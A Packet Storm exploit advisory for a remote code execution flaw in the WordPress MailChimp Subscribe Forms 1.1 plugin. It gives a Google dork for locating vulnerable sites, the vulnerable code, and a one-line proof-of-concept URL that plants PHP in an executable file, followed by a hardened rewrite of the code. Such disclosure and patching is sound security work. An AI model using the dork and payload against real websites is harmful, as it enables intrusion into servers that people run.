WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution

2016-03-23T00:00:00
ID PACKETSTORM:136396
Type packetstorm
Reporter CrashBandicot
Modified 2016-03-23T00:00:00

Description

# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution  
# Date: 23-03-2016  
# Exploit Author: CrashBandicot  
# Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/  
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/  
# Tested on: MSWin32  
# Version: 1.1  
  
# Vulnerability in GET  
# Subscribe with an e-mail address, but add the GET parameter sm_name containing PHP code to the URL  
  
# Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php  
  
18. if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) {  
...  
23. $smf_data = '* Name : '.$_GET['sm_name'];  
24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL;  
...  
36. $file = "sm_subscribers_list.php";   
...  
39. $fp = fopen($file, "a");   
40. fwrite($fp, $smf_data);  
...  
42. fclose($fp);  
  
# PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe  
  
# Result: the submitted sm_name is written verbatim into sm_subscribers_list.php, which the web server executes as PHP  
  
# PicS : http://i.imgur.com/HHtuycC.png  
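As an added hardening example (not the plugin's own code), the store-address logic from the excerpt above is rewritten so that sm_name is validated against an allow-list of name characters and the subscriber list is appended to a plain-text file outside the web root, so nothing written there can ever be executed. The data-file path and the function names are assumptions for illustration.

```php
<?php
// Hardened rewrite of the store-address logic (added example, not plugin code).
// Assumes the same GET parameters as the advisory: sm_name and sm_email.

// Hypothetical path: a .txt file outside the document root. Even if PHP tags
// reached this file, the web server would never serve or execute it.
define('SM_LIST_FILE', __DIR__ . '/../data/sm_subscribers_list.txt');

function sm_valid_email(string $email): bool
{
    // Replaces the hand-written regex with PHP's built-in validator.
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

function sm_valid_name(string $name): bool
{
    // Allow-list: letters (any script), combining marks, space, dot, apostrophe,
    // hyphen. Characters such as '<', '?', ';' are rejected outright, so a
    // payload like "<?php phpinfo(); ?>" never reaches storage.
    return strlen($name) <= 100
        && preg_match("/^[\p{L}\p{M} .'-]+$/u", $name) === 1;
}

function sm_store(string $name, string $email): bool
{
    if (!sm_valid_name($name) || !sm_valid_email($email)) {
        return false;
    }
    $line = '* Name : ' . $name . ' Email : ' . $email . ' , ' . PHP_EOL;
    // FILE_APPEND matches the original "a" mode; LOCK_EX avoids interleaved
    // writes from concurrent subscriptions.
    return file_put_contents(SM_LIST_FILE, $line, FILE_APPEND | LOCK_EX) !== false;
}

if (isset($_GET['sm_name'], $_GET['sm_email'])) {
    $ok = sm_store((string) $_GET['sm_name'], (string) $_GET['sm_email']);
    http_response_code($ok ? 200 : 400);
    echo $ok ? 'subscribed' : 'invalid input';
}
```

With this layout a request carrying sm_name=<?php phpinfo(); ?> is answered with HTTP 400 and nothing is written; even a bypass of the name check would only land text in a non-executable file the web server cannot reach.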